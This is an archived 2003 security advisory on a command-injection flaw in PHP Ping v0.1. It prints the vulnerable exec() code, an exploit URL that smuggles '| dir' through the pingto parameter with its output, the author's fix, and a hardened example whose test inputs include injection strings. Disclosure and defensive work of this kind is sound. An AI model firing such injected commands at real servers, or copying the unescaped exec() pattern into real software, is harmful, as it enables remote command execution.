SCSA009.txt

2003-03-07T00:00:00
ID PACKETSTORM:30883
Type packetstorm
Reporter Gregory Le Bras
Modified 2003-03-07T00:00:00

Description

                                        
________________________________________________________________________  
  
Security Corporation Security Advisory [SCSA-009]  
________________________________________________________________________  
  
PROGRAM: PHP Ping  
HOMEPAGE: http://www.phpapps.org/  
VULNERABLE VERSIONS: v0.1 and prior  
________________________________________________________________________  
  
DESCRIPTION  
________________________________________________________________________  
  
PHP ping "will allow you, provided that your server turns under Windows,  
to realize a "ping" on the host of your choice."  
  
(direct quote from PHP Ping website)  
  
  
DETAILS  
________________________________________________________________________  
  
A vulnerability has been found in PHP Ping which allows remote attackers  
to execute arbitrary commands on the web server.  
  
The user-supplied target ($cible) is interpolated unfiltered into the  
command line handed to exec(), so shell metacharacters such as "|" or ";"  
append further commands to the ping invocation. A remote attacker could  
thereby compromise parts of the operating system, possibly the complete  
operating system.  
  
Vulnerable code (unchanged from PHP Ping, comments added):  
  
<?  
//*************************************  
// PING FUNCTION  
//*************************************  
function PHPing($cible,$pingFile){  
    // $cible goes straight into the command line: no validation and no  
    // escapeshellarg(), so any shell metacharacter in it is executed.  
    exec("ping -a -n 1 $cible >$pingFile", $list);  
    // The output is read back from the redirected file rather than from  
    // $list, which exec() has already filled with the same lines.  
    $ping = "";  
    $fd = fopen($pingFile, "r");  
    while(!feof($fd))  
    {  
        $ping.= fgets($fd,256);  
    }  
    fclose($fd);  
    return $ping;  
}  
//-------------------------------------  
?>  
  
  
EXPLOIT  
________________________________________________________________________  
  
The vulnerability can be exploited through the page that executes the  
"ping", at this address:  
  
http://[target]/phpping/index.php?pingto=www.security-corp.org%20|%20dir  
  
The "%20|%20dir" appended to the target is decoded to " | dir" and lands  
on the command line as "ping -a -n 1 www.security-corp.org | dir", so the  
shell runs ping and then dir. This example simply lists the contents of  
the current directory:  
  
c:\phpping  
  
03/03/2003 23:01 <DIR> .  
03/03/2003 23:01 <DIR> ..  
03/03/2003 23:00 <DIR> img  
30/04/2002 23:13 3217 index.php  
30/04/2002 23:19 921 README  
03/03/2003 23:03 0 resultat.ping  
3 file(s) 4138 bytes  
3 Dir(s) 11413962752 bytes free  
  
  
SOLUTIONS  
________________________________________________________________________  
  
For example, replace the function with the following code, which rejects  
any target that does not look like a hostname or IP address before it  
reaches exec():  
  
<?  
//*************************************  
// PING FUNCTION  
//*************************************  
function PHPing($cible,$pingFile){  
  
    # BugFix by Gregory LEBRAS www.security-corp.org  
  
    // Only letters, digits, dots and hyphens, ending in a 1-3 character  
    // label: spaces, pipes, semicolons and other shell metacharacters  
    // never reach the command line.  
    if( (!$cible) ||  
        (!preg_match("/^[\w\d\.\-]+\.[\w\d]{1,3}$/i",$cible)) ){  
        echo("Error: Please specify a valid target host or IP.");  
        exit;  
    }  
    else  
    {  
        exec("ping -a -n 1 $cible >$pingFile", $list);  
        $ping = "";  
        $fd = fopen($pingFile, "r");  
        while(!feof($fd))  
        {  
            $ping.= fgets($fd,256);  
        }  
        fclose($fd);  
        return $ping;  
    }  
}  
//------------------------------------  
?>  
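  
The pattern above stops the injection shown in this advisory, since it  
admits no spaces, pipes or semicolons, but it has limits worth knowing: a  
target beginning with "-" still matches and is handed to ping looking like  
an option rather than a host, "\w" also admits underscores, and legitimate  
names whose last label is longer than three characters (a ".info" domain,  
for instance) are rejected. What follows is an added example, not code  
from the PHP Ping project or from this advisory, of the approach a  
practitioner would normally combine with such a check: validate the  
target against a hostname allow-list that forbids a leading hyphen, then  
escape it with PHP's escapeshellarg() so the shell treats it as a single  
token whatever it contains, and read ping's output from exec()'s own  
output array instead of a redirected temporary file. The function names  
isValidPingTarget and PHPingSafe, and the sample inputs, are assumptions  
made for this example; the ping options are the advisory's own Windows  
ones.  
  
```php
<?php
// Added example (not the PHP Ping project's code): a hardened replacement
// for PHPing() that validates the target, escapes it for the shell, and
// drops the temporary file. Function names and samples are assumptions.

// Returns true when $target looks like a hostname or IPv4 address that is
// safe to hand to ping: dot-separated labels of letters, digits and inner
// hyphens only, so no shell metacharacters and no leading "-" that ping
// could parse as an option.
function isValidPingTarget($target) {
    if (!is_string($target) || strlen($target) > 253) {
        return false;
    }
    // One label: 1-63 chars, alphanumeric at both ends, hyphens only inside.
    $label = '[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    // Require at least one dot, as the advisory's own pattern does.
    return preg_match('/^' . $label . '(?:\.' . $label . ')+$/', $target) === 1;
}

// Runs ping with the validated, shell-escaped target and returns its output.
// exec() already collects stdout line by line into $lines, so the
// "> $pingFile" redirect of the original is not needed.
function PHPingSafe($target) {
    if (!isValidPingTarget($target)) {
        return 'Error: Please specify a valid target host or IP.';
    }
    $lines = array();
    $status = 0;
    // escapeshellarg() quotes the argument as one token; together with the
    // allow-list above it cannot terminate or extend the command.
    exec('ping -a -n 1 ' . escapeshellarg($target), $lines, $status);
    return implode("\n", $lines);
}

// Constructed inputs (assumptions for this example) showing what the check
// accepts and rejects; the third one is the attack string from this advisory.
$samples = array(
    'www.security-corp.org',       // accepted
    '192.168.0.1',                 // accepted
    'www.security-corp.org | dir', // rejected: space and pipe
    'www.security-corp.org;dir',   // rejected: semicolon
    '-t.local',                    // rejected: leading hyphen (looks like a ping option)
    'localhost',                   // rejected: no dot, same rule as the advisory's pattern
);
foreach ($samples as $s) {
    printf("%-30s %s\n", $s, isValidPingTarget($s) ? 'accepted' : 'rejected');
}
?>
```
  
Run it from the command line with php on the Windows host the advisory  
targets to see the accept/reject table; on another OS the validation is  
the same but the ping options differ. The allow-list is the first line of  
defence and escapeshellarg() the second, so a mistake in one does not  
reopen the command line on its own.  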
  
  
VENDOR STATUS  
________________________________________________________________________  
  
The vendor has reportedly been notified.  
  
  
LINKS  
________________________________________________________________________  
  
French version:  
  
http://www.security-corp.org/advisories/SCSA-009-FR.txt  
  
  
------------------------------------------------------------  
Grégory Le Bras aka GaLiaRePt | http://www.Security-Corp.org  
------------------------------------------------------------  
  
  
  